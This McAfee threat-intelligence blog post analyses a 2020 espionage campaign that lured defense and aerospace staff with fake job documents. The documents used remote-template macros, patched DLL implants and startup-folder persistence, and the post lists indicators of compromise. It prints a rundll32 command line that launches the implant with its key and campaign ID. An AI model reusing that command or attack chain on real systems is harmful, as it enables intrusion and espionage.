These campaigns impact the security of South Korea and foreign nations with malicious cyber campaigns. In this blog McAfee ATR analyzes multiple campaigns conducted in the first part of 2020.

Finally, we see the adversary expanding the false job recruitment campaign to other sectors outside of defense and aerospace, such as a document masquerading as a finance position for a leading animation studio.

In this blog we will cover:

Target of Interest – Defense & Aerospace Campaign

This is not the first time that we have observed threat actors using the defense and aerospace industry as lures in malicious documents. In 2017 and 2019, there were efforts to send malicious documents to targets that contained job postings for positions at leading defense contractors3

The objective of these campaigns was to gather information on specific programs and technologies. Like the 2017 campaign, the 2020 campaign also utilized legitimate job postings from several leading defense and aerospace organizations. In the 2020 campaign that McAfee ATR observed, some of the same defense contractors from the 2017 operation were again used as lures in malicious documents.

This new activity noted in 2020 uses similar Techniques, Tactics and Procedures (TTPs) to those seen in a 2017 campaign that targeted individuals in the Defense Industrial Base (DIB). The 2017 activity was included in an indictment by the US government and attributed to the Hidden Cobra threat group4

Attack Overview

Phase One: Initial Contact

This recent campaign used malicious documents to install malware on the targeted system using a template injection attack. This technique allows a weaponized document to download an external Word template containing macros that will be executed. This is a known trick used to bypass static malicious document analysis, as well as detection, as the macros are embedded in the downloaded template.

Further, these malicious Word documents contained content related to legitimate jobs at these leading defense contractors. All three organizations have active defense contracts of varying size and scope with the US government.

The timeline for these documents, that were sent to an unknown number of targets, ran between 31 March and 18 May 2020.

Document creation timeline

Malign documents were the main entry point for introducing malicious code into the victim’s environment. These documents contained job descriptions from defense, aerospace and other sectors as a lure. The objective would be to send these documents to a victim’s email with the intention they open, view and ultimately execute the payload.

As we mentioned, the adversary used a technique called template injection. When a document contains the .docx extension, in our case, it means that we are dealing with the Open Office XML standard. A .docx file is a zip file containing multiple parts. Using the template injection technique, the adversary puts a link towards the template file in one of the .XML files, for example the link is in settings.xml.rels while the external oleobject load is in document.xml.rels. The link will load a template file (DOTM) from a remote server. This is a clever technique we observe being used by multiple adversaries [5] and is intended to make a document appear to be clean initially, only to subsequently load malware. Some of these template files are renamed as JPEG files when hosted on a remote server to avoid any suspicion and bypass detection. These template files contain Visual Basic macro code, that will load a DLL implant onto the victim’s system. Current McAfee technologies currently protect against this threat.

We mentioned earlier that docx files (like xlsx and pptx) are part of the OOXML standard. The document defining this standard[6], describes the syntax and values that can be used as an  example. An interesting file to look at is the ‘settings.xml’ file that can be discovered in the ‘Word’ container of the docx zip file. This file contains settings with regards to language, markup and more. First, we extracted all the data from the settings.xml files and started to compare. All the documents below contained the same language values:


The XML file ends with a GUID value that starts with the value “w15”.

Example: w15:val=”{932E534D-8C12-4996-B261-816995D50C69}”/></w:settings>

According to the Microsoft documentation, w15 defines the PersistentDocumentId Class. When the object is serialized out as xml, its qualified name is w15:docId. The 128-bit GUID is set as an ST_Guid attribute which, according to the Microsoft documentation, refers to a unique token. The used class generates a GUID for use as the DocID and generates the associated key. The client stores the GUID in that structure and persists in the doc file. If, for example, we would create a document and would “Save As”, the w15:docId GUID would persist across to the newly created document. What would that mean for our list above? Documents with the same GUID value need to be placed in chronological order and then we can state the earliest document is the root for the rest, for example:

What we can say from above table is that ‘_IFG_536R.docx” was the first document we observed and that later documents with the same docID value were created from the same base document.

To add to this assertion; in the settings.xml file the value “rsid” (Revision Identifier for Style Definition) can be found. According to Microsoft’s documentation: “This element specifies a unique four-digit number which shall be used to determine the editing session in which this style definition was last modified. This value shall follow this following constraint: All document elements which specify the same rsid* values shall correspond to changes made during the same editing session. An editing session is defined as the period of editing which takes place between any two subsequent save actions.”

Let’s start with the rsid element values from “*_IFG_536R.docx”:

And compare with the rsid element values from “*_PMS.docx”:

The rsid elements are identical for the first four editing sessions for both documents. This indicates that these documents, although they are now separate, originated from the same document.

Digging into more values and metadata (we are aware they can be manipulated), we created the following overview in chronological order based on the creation date:

When we zoom in on the DocID “932E534d(..) we read the value of a template file in the XML code: “Single spaced (blank).dotx” – this template name seems to be used by multiple “Author” names. The revision number indicates the possible changes in the document.

Note: the documents in the table with “No DocID” were the “dotm” files containing the macros/payload.

All files were created with Word 2016 and had both the English and Korean languages installed. This analysis into the metadata indicates that there is a high confidence that the malicious documents were created from a common root document.

Document Templates

There were several documents flagged as non-malicious discovered during our investigation. At first glance they did not seem important or related at all, but deeper investigation revealed how they were connected. These documents played a role in building the final malicious documents that ultimately got sent to the victims. Further analysis of these documents, based on metadata information, indicated that they contained relationships to the primary documents created by the adversary.

Two PDF files (***_SPE_LEOS and ***_HPC_SE) with aerospace & defense industry themed images, created via the Microsoft Print to PDF service, were submitted along with ***_ECS_EPM.docx. The naming convention of these PDF files was very similar to the malicious documents used. The name includes abbreviations for positions at the defense contractor much like the malicious documents. The Microsoft Print to PDF service enables content from a Microsoft Word document be printed to PDF directly. In this case these two PDF files were generated from an original Microsoft Word document with the author ‘HOME’. The author ‘HOME’ appeared in multiple malicious documents containing job descriptions related to aerospace, defense and the entertainment industry. The PDFs were discovered in an archive file indicating that LinkedIn may have been a possible vector utilized by the adversaries to target victims. This is a similar vector as to what has been observed in a campaign reported by industry[7], however as mentioned earlier the research covered in this blog is part of a different activity set.

Metadata from PDF file submitted with ***_ECS_EPM.docx in archive with context fake LinkedIn

Visual Basic Macro Code

Digging into the remote template files reveals some additional insight concerning the structure of the macro code. The second stage remote document template files contain Visual Basic macro code designed to extract a double base64 encoded DLL implant. The content is all encoded in UserForm1 in the remote DOTM file that is extracted by the macro code.

Macro code (17.dotm) for extracting embedded DLL

Further, the code will also extract the embedded decoy document (a clean document containing the job description) to display to the victim.

Code (17.dotm) to extract clean decoy document

Macro code (******_dds_log.jpg) executed upon auto execution

Phase Two: Dropping Malicious DLLs

The adversary used malicious DLL files, delivered through stage 2 malicious documents, to spy on targets. Those malicious documents were designed to drop DLL implants on the victim’s machine to collect initial intelligence. In this campaign the adversary was utilizing patched SQL Lite DLLs to gather basic information from its targets. These DLLs were modified to include malicious code to be executed on the victim’s machine when they’re invoked under certain circumstances. The purpose of these DLLs is/was to gather machine information from infected victims that could be used to further identify more interesting targets.

The first stage document sent to targeted victims contained an embedded link that downloaded the remote document template.

Embedded link contained within Word/_rels/settings.xml.rels

The DOTM (Office template filetype) files are responsible for loading the patched DLLs onto the victim’s machine to collect and gather data. These DOTM files are created with DLL files  encoded directly into the structure of the file. These DOTM files exist on remote servers compromised by the adversary; the first stage document contains an embedded link that refers to the location of this file. When the victim opens the document, the remote DOTM file that contains a Visual Basic macro code to load malicious DLLs, is loaded. Based on our analysis, these DLLs were first seen on 20 April 2020 and, to our knowledge based on age and prevalence data, these implants have been customized for this attack.

The workflow of the attack can be represented by the following image:

To identify the malicious DLLs that will load or download the final implant, we extracted from the Office files found in the triage phase, the following DLL files:

SHA256 Original File name Compile Date


wsuser.db 4/24/2020


unknown 4/24/2020


onenote.db 4/01/2020
48b8486979973656a15ca902b7bb973ee5cde9a59e2f3da53c86102d48d7dad8 onenote.db 4/01/2020


wsuser.db 4/24/2020

These DLL files are patched versions from goodware libraries, like the SQLITE library found in our analysis, and are loaded via a VBScript contained within the DOTM files that loads a double Base64 encoded DLL as described in this analysis. The DLL is encoded in UserForm1 (contained within the Microsoft Word macro) and the primary macro code is responsible for extracting and decoded the DLL implant.

DOTM Document Structure

Implant DLLs encoded in UserForm1

From our analysis, we could verify how the DLLs used in the third stage were legitimate software with a malicious implant inside that would be enabled every time a specific function was called with a set of parameters.

Analyzing the sample statically, it was possible to extract the legitimate software used to store the implant, for example, one of the DLL files extracted from the DOTM files was a patched SQLITE library. If we compare the original library within the extracted DLL, we can spot lot of similarities across the two samples:

Legitimate library to the left, malicious library to the right

As mentioned, the patched DLL and the original SQLITE library share a lot of code:

Both DLLs share a lot of code internally

The first DLL stage needs certain parameters in order to be enabled and launched in the system. The macro code of the Office files we analyzed, contained part of these parameters:

Information found in the pcode of the document

The data found in the VBA macro had the following details:

  • 32-bit keys that mimic a Windows SID
    • The first parameter belongs to the decryption key used to start the malicious activity.
    • This could be chosen by the author to make the value more realistic
  • Campaign ID

DLL Workflow

The analysis of the DLL extracted from the ‘docm’ files (the 2nd stage of the infection) revealed  the existence of two types of operation for these DLLs:

DLL direct execution:

  • The DLL unpacks a new payload in the system.

Drive-by DLLs:

  • The DLL downloads a new DLL implant from a remote server delivering an additional DLL payload into the system.

For both methods, the implant starts collecting the target information and then contacts the command and control (C2) server

We focused our analysis into the DLLs files that are unpacked into the system.

Implant Analysis

The DLL implant will be executed after the user interacts by opening the Office file. As we explained, the p-code of the VBA macro contains parts of the parameters needed to execute the implant into the system.

The new DLL implant file will be unpacked (depending of the campaign ID) inside a folder inside the AppData folder of the user in execution:


The DLL file, must be launched with 5 different parameters if we want to observe the malicious connection within the C2 domain; in our analysis we observed how the DLL was launched with the following command line:

C:\Windows\System32\rundll32.exe “C:\Users\user\AppData\Local\Microsoft\Notice\wsdts.db”, sqlite3_steps S-6-81-3811-75432205-060098-6872 0 0 61 1

The required parameters to launch the malicious implant are:

Parameter number Description
1 Decryption key
2 Unused value, hardcoded in the DLL
3 Unused value, hardcoded in the DLL
4 Campaign identifier
5 Unused value, hardcoded in the DLL


As we explained, the implants are patched SQLITE files and that is why we could find additional functions that are used to launch the malicious implant, executing the binary with certain parameters. It is necessary to use a specific export ‘sqlite3_steps’ plus the parameters mentioned before.

Analyzing the code statically we could observe that the payload only checks 2 of these 5 parameters but all of them must be present in order to execute the implant:

sqlite malicious function

Phase Three: Network Evasion Techniques

Attackers are always trying to remain undetected in their intrusions which is why it is common to observe techniques such as mimicking the same User-Agent that is present in the system, in order to remain under the radar. Using the same User-Agent string from the victim’s web browser configurations, for example, will help avoid network-based detection systems from flagging outgoing traffic as suspicious. In this case, we observed how, through the use of the Windows API ObtainUserAgentString, the attacker obtained the User-Agent and used the value to connect to the command and control server:

If the implant cannot detect the User-Agent in the system, it will use the default Mozilla User-Agent instead:


Running the sample dynamically and intercepting the TLS traffic, we could see the connection to the command and control server:

Unfortunately, during our analysis, the C2 was not active which limited our ability for further analysis.

The data sent to the C2 channel contains the following information:

Parameter Description
C2 C2 configured for that campaign
ned Campaign identifier
key 1 AES key used to communicate with the C2
key 2 AES key used to communicate with the C2
sample identifier Sample identifier sent to the C2 server
gl Size value sent to the C2 server
hl Unknown parameter always set to 0

We could find at least 5 different campaign IDs in our analysis, which suggests that the analysis in this document is merely the tip of the iceberg:

Dotx file Campaign ID
61.dotm 0
17.dotm 17
43.dotm 43
83878C91171338902E0FE0FB97A8C47A.dotm 204
******_dds_log 100

Phase Four: Persistence

In our analysis we could observe how the adversary ensures persistence by delivering an LNK file into the startup folder

The value of this persistent LNK file is hardcoded inside every sample:

Dynamically, and through the Windows APIs NtCreateFile and NtWriteFile, the LNK is written in the startup folder. The LNK file contains the path to execute the DLL file with the required parameters.


Additional Lures: Relationship to 2020 Diplomatic and Political Campaign

Further investigation into the 2020 campaign activity revealed additional links indicating the adversary was using domestic South Korean politics as lures. The adversary created several documents in the Korean language using the same techniques as the ones seen in the defense industry lures. One notable document, with the title US-ROK Relations and Diplomatic Security in both Korean and English, appeared on 6 April 2020 with the document author JangSY.

US-ROK Relation and Diplomatic Security

The document was hosted on the file sharing site hxxps:// and contained an embedded link referring to a remote DOTM file hosted on another file sharing site ( The BASE64 coded value MzBfMjA1Njc0ODhf is a unique identifier for the user associated with the file sharing platform

A related document discovered with the title test.docx indicated that the adversary began testing these documents in early April 2020. This document contained the same content as the above but was designed to test the downloading of the remote template file by hosting it on a private IP address. The document that utilized pubmaterial.dotm for its remote template also made requests to the URL hxxp://

This domain ( is connected to numerous other Korean language malicious documents that also appeared in 2020 including documents related to political or diplomatic relations. One such document (81249fe1b8869241374966335fd912c3e0e64827) was using the 21st National Assembly Election as part of the title, potentially indicating those interested in politics in South Korea were a target. For example, another document (16d421807502a0b2429160e0bd960fa57f37efc4) used the name of an individual, director Jae-chun Lee. It also shared the same metadata.

The original author of these documents was listed as Seong Jin Lee according to the embedded metadata information. However, the last modification author (Robot Karll) used by the adversary during document template creation is unique to this set of malicious documents. Further, these documents contain political lures pertaining to South Korean domestic policy that suggests that the targets of these documents also spoke Korean.

Relationship to 2019 Falsified Job Recruitment Campaign

A short-lived campaign from 2019 using India’s aerospace industry as a lure used what appears to be very similar methods to this latest campaign using the defense industry in 2020. Some of the TTPs from the 2020 campaign match that of the operation in late 2019. The activity from 2019 has also been attributed to Hidden Cobra by industry reporting.

The campaign from October 2019 also used aerospace and defense as a lure, using copies of legitimate jobs just like we observed with the 2020 campaign. However, this campaign was isolated to the Indian defense sector and from our knowledge did not expand beyond this. This document also contained a job posting for a leading aeronautics company in India; this company is focused on aerospace and defense systems. This targeting aligns with the 2020 operation and our analysis reveals that the DLLs used in this campaign were also modified SQL Lite DLLs.

Based on our analysis, several variants of the implant were created in the October 2019 timeframe, indicating the possibility of additional malicious documents.

Sha1 Compile Date File Name
f3847f5de342632f8f9e2901f16b7127472493ae 10/12/2019 MFC_dll.DLL
659c854bbdefe692ee8c52761e7a8c7ee35aa56c 10/12/2019 MFC_dll.DLL
35577959f79966b01f520e2f0283969155b8f8d7 10/12/2019 MFC_dll.DLL
975ae81997e6cd8c8a3901308d33c868f23e638f 10/12/2019 MFC_dll.DLL


One notable difference with the 2019 campaign is the main malicious document contained the implant payload, unlike the 2020 campaign that relied on the Microsoft Office remote template injection technique. Even though the technique is different, we did observe likenesses as we began to dissect the remote template document. There are some key similarities within the VBA code embedded in the documents. Below we see the 2019 (left) and 2020 (right) side-by-side comparison of two essential functions, that closely match each other, within the VBA code that extracts/drops/executes the payload.

VBA code of 13c47e19182454efa60890656244ee11c76b4904 (left) and acefc63a2ddbbf24157fc102c6a11d6f27cc777d (right)

The VBA macro drops the first payload of thumbnail.db at the filepath, which resembles the filepath used in 2020.

The VB code also passes the decryption key over to the DLL payload, thumbnail.db. Below you can see the code within thumbnail.db accepting those parameters.

Unpacked thumbnail.db bff1d06b9ef381166de55959d73ff93b

What is interesting is the structure in which this information is being passed over. This 2019 sample is identical to what we documented within the 2020 campaign.


Another resemblance discovered was the position of the .dll implant existing in the exact same location for both 2019 and 2020 samples; “o” field under “UserForms1”.

“o” field of 13c47e19182454efa60890656244ee11c76b4904

All 2020 .dotm IoCs contain the same .dll implant within the “o” field under “UserForms1”, however, to not overwhelm this write-up with separate screenshots, only one sample is depicted below. Here you can see the parallel between both 2019 and 2020 “o” sections.

“o” field of acefc63a2ddbbf24157fc102c6a11d6f27cc777d

Another similarity is the encoding of double base64, though in the spirit of competing hypothesis, we did want to note that other adversaries may also use this type of encoding. However, when you couple these similarities with the same lure of an Indian defense contractor, the pendulum starts to lean more to one side of a possible common author between both campaigns. This may indicate another technique being added to the adversary’s arsenal of attack vectors.

One method to keep the campaign dynamic and more difficult to detect is hosting implant code remotely. There is one disadvantage of embedding an implant within a document sent to a victim; the implant code could be detected before the document even reaches the victim’s inbox. Hosting it remotely enables the implant to be easily switched out with new capabilities without running the risk of the document being classified as malicious.

**-HAL-MANAGER.doc UserForm1 with double base64 encoded DLL

17.DOTM UserForm1 with double base64 encoded DLL from ******_DSS_SE.docx

According to a code similarity analysis, the implant embedded in **-HAL-Manager.doc contains some similarities to the implants from the 2020 campaign. However, we believe that the implant utilized in the 2019 campaign associated with **-Hal-Manager.doc may be another component. First, besides the evident similarities in the Visual Basic macro code and the method for encoding (double base64) there are some functional level similarities. The DLL file is run in a way with similar parameters.


DLL execution code **-Hal-Manager.doc implant

DLL execution code 2020 implant

Campaign Context: Victimology

The victimology is not exactly known due to the lack of spear phishing emails uncovered; however, we can obtain some insight from the analysis of telemetry information and lure document context. The lure documents contained job descriptions for engineering and project management positions in relationship to active defense contracts. The individuals receiving these documents in a targeted spear phishing campaign were likely to have an interest in the content within these lure documents, as we have observed in previous campaigns, as well as some knowledge or relationship to the defense industry.

Infrastructure Insights

Our analysis of the 2019 and 2020 campaigns reveals some interesting insight into the command and control infrastructure behind them, including domains hosted in Italy and the United States. During our investigation we observed a pattern of using legitimate domains to host command and control code. This is beneficial to the adversary as most organizations do not block trusted websites, which allows for the potential bypass of security controls. The adversary took the effort to compromise the domains prior to launching the actual campaign. Further, both 2019 and 2020 job recruitment campaigns shared the same command and control server hosted at

The domain with its various sub-domains have been used by Hidden Cobra in 2020. The domains identified to be used in various operations in 2020 falling under the domain are:


Some of these campaigns use similar methods as the 2020 defense industry campaign:

  • Malicious document with the title European External Action Service [8]
  • Document with Korean language title 비건 미국무부 부장관 서신doc (U.S. Department of State Secretary of State Correspondence 20200302.doc).

Techniques, Tactics and Procedures (TTPS)

The TTPs of this campaign align with those of previous Hidden Cobra operations from 2017 using the same defense contractors as lures. The 2017 campaign also utilized malicious Microsoft Word documents containing job postings relating to certain technologies such as job descriptions for engineering and project management positions involving aerospace and military surveillance programs. These job descriptions are legitimate and taken directly from the defense contractor’s website. The exploitation method used in this campaign relies upon a remote Office template injection method, a technique that we have seen state actors use recently.

However, it is not uncommon to use tools such as EvilClippy to manipulate the behavior of Microsoft Office documents. For example, threat actors can use pre-built kits to manipulate clean documents and embed malicious elements; this saves time and effort. This method will generate a consistent format that can be used throughout campaigns. As a result, we have observed a consistency with how some of the malicious elements are embedded into the documents (i.e. double base64 encoded payload). Further mapping these techniques across the MITRE ATT&CK framework enables us to visualize different techniques the adversary used to exploit their victims.

MITRE ATT&CK mapping for malicious documents

These Microsoft Office templates are hosted on a command and control server and the downloaded link is embedded in the first stage malicious document.

The job postings from these lure documents are positions for work with specific US defense programs and groups:

  • F-22 Fighter Jet Program
  • Defense, Space and Security (DSS)
  • Photovoltaics for space solar cells
  • Aeronautics Integrated Fighter Group
  • Military aircraft modernization programs

Like previous operations, the adversary is using these lures to target individuals, likely posing as a recruiter or someone involved in recruitment. Some of the job postings we have observed:

  • Senior Design Engineer
  • System Engineer

Professional networks such as LinkedIn could be a place used to deliver these types of job descriptions.

Defensive Architecture Recommendations

Defeating the tactics, techniques and procedures utilized in this campaign requires a defense in depth security architecture that can prevent or detect the attack in the early stages. The key controls in this case would include the following:

  1. Threat Intelligence Research and Response Program. Its critical to keep up with the latest Adversary Campaigns targeting your specific vertical. A robust threat response process can then ensure that controls are adaptable to the TTPs and, in this case, create heightened awareness
  2. Security Awareness and Readiness Program. The attackers leveraged spear-phishing with well-crafted lures that would be very difficult to detect initially by protective technology. Well-trained and ready users, informed with the latest threat intelligence on adversary activity, are the first line of defense.
  3. End User Device Security. Adaptable endpoint security is critical to stopping this type of attack early, especially for users working from home and not behind the enterprise web proxy or other layered defensive capability. Stopping or detecting the first two stages of infection requires an endpoint security capability of identifying file-less malware, particularly malicious Office documents and persistence techniques that leverage start-up folder modification.
  4. Web Proxy. A secure web gateway is an essential part of enterprise security architecture and, in this scenario, can restrict access to malicious web sites and block access to the command and control sites.
  5. Sec Ops – Endpoint Detection and Response (EDR) can be used to detect techniques most likely in stages 1, 2 or 4. Additionally, EDR can be used to search for the initial documents and other indicators provided through threat analysis.

For further information on how McAfee Endpoint Protection and EDR can prevent or detect some of the techniques used in this campaign, especially use of malicious Office documents, please refer to these previous blogs and webinar:

Indicators of Compromise

SHA256 File Name
322aa22163954ff3ff017014e357b756942a2a762f1c55455c83fd594e844fdd ******_DSS_SE.docx


a3eca35d14b0e020444186a5faaba5997994a47af08580521f808b1bb83d6063 ******_PMS.docx


d1e2a9367338d185ef477acc4d91ad45f5e6a7d11936c3eb4be463ae0b119185 ***_JD_2020.docx
ecbe46ca324096fd5e35729f39fa3bda9226bbefd6286d53e61b1be56a36de5b ***_2020_JD_SDE.docx
40fbac7a241bea412734134394ca81c0090698cf0689f2b67c54aa66b7e04670 83878C91171338902E0FE0FB97A8C47A.dotm
6a3446b8a47f0ab4f536015218b22653fff8b18c595fbc5b0c09d857eba7c7a1 ******_AERO_GS.docx
df5536c254a5d9ac626dbff7525de8301729807433d377db807ce3d8bc7c3ffe **_IFG_536R.docx
1b0c82e71a53300c969da61b085c8ce623202722cf3fa2d79160dac16642303f 43.dotm
d7ef8935437d61c975feb2bd826d018373df099047c33ad7305585774a272625 17.dotm
49724ee7a6baf421ac5a2a3c93d32e796e2a33d7d75bbfc02239fc9f4e3a41e0 Senior_Design_Engineer.docx


66e5371c3da7dc9a80fb4c0fabfa23a30d82650c434eec86a95b6e239eccab88 61.dotm
7933716892e0d6053057f5f2df0ccadf5b06dc739fea79ee533dd0cec98ca971 ******_spectrolab.docx
43b6b0af744124da5147aba81a98bc7188718d5d205acf929affab016407d592 ***_ECS_EPM.docx
70f66e3131cfbda4d2b82ce9325fed79e1b3c7186bdbb5478f8cbd49b965a120 ******_dds_log.jpg
adcdbec0b92da0a39377f5ab95ffe9b6da9682faaa210abcaaa5bd51c827a9e1 21 국회의원 선거 관련.docx
dbbdcc944c4bf4baea92d1c1108e055a7ba119e97ed97f7459278f1491721d02 외교문서 관련(이재춘국장).docx




In summary, ATR has been tracking a targeted campaign focusing on the aerospace and defense industries using false job descriptions. This campaign looks very similar, based on shared TTPs, with a campaign that occurred in 2017 that also targeted some of the same industry. This campaign began early April 2020 with the latest activity in mid-June. The campaign’s objective is to collect information from individuals connected to the industries in the job descriptions.

Additionally, our forensic research into the malicious documents show they were created by the same adversary, using Korean and English language systems. Further, discovery of legitimate template files used to build these documents also sheds light on some of the initial research put into the development of this campaign. While McAfee ATR has observed these techniques before, in previous campaigns in 2017 and 2019 using the same TTPs, we can conclude there has been an increase in activity in 2020.

McAfee detects these threats as

  • Trojan-FRVP!2373982CDABA
  • Generic Dropper.aou
  • Trojan-FSGY!3C6009D4D7B2
  • Trojan-FRVP!CEE70135CBB1
  • W97M/Downloader.cxu
  • Trojan-FRVP!63178C414AF9
  • Trojan-FRVP!AF83AD63D2E3
  • RDN/Generic Downloader.x
  • W97M/Downloader.bjp
  • W97M/MacroLess.y

NSP customers will have new signatures added to the “HTTP: Microsoft Office OLE Arbitrary Code Execution Vulnerability (CVE-2017-0199)” attack name. The updated attack is part of our latest NSP sigset release: sigset released on 28th July 2020.The KB details can be found here: KB55446






[5] – Gamaredon Group




The post Operation (노스 스타) North Star A Job Offer That’s Too Good to be True? appeared first on McAfee Blog.
